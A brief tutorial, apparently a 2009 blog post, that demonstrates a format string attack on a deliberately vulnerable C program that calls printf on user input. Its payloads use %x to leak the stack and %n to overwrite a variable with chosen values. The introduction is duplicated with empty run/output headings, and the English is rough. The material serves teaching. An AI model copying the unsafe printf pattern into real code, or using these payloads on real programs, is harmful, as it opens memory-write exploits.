2009-12-25 Linux Format String Attack 1
Format string attack is attack for C formated strings. Format string
function is prinrf() there are other functions that
support format string.C code for bad used printf():
First output is adress of static iThan we outputing values of
i and call printf() with first argument fo prgramm.and
then watching value if i
Run:
Output:
Run:
Output:
Run:
Output:
Read about %n in format string:
Run:
Output:
Run:
Output:
Run:
Output:
Now you can input almost any value to i
function is prinrf() there are other functions that
support format string.C code for bad used printf():
int main( int argc, char **argv ) { static int i = 0; char text[1000]; strcpy(text, argv[1]); printf("%.8x\n",&i); printf("No way it never will works because value of i=%d\n",i); printf( text ); printf("\nValue of i=%d\n",i); return 0; }
First output is adress of static iThan we outputing values of
i and call printf() with first argument fo prgramm.and
then watching value if i
Run:
./e1 'Halolo'
Output:
08049674 No way it never will works because value of i=0 Halolo Value of i=0
Run:
./e1 'Halolo%s'
Output:
08049674 No way it never will works because value of i=0Halolo(null) Value of i=0
Run:
./e1 $'\x74\x96\x04\x08_%x'
Output:
08049674 No way it never will works because value of i=0 t?_0 Value of i=0
Read about %n in format string:
Run:
./e1 $'\x74\x96\x04\x08_%x_%n'
Output:
08049674 No way it never will works because value of i=0 Segmentation fault
Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
Output:
08049674 No way it never will works because value of i=0 t?_0_8_40_4_4_ Value of i=16
Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
Output:
08049674 No way it never will works because value of i=0 t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000004_ Value of i=1216
Now you can input almost any value to i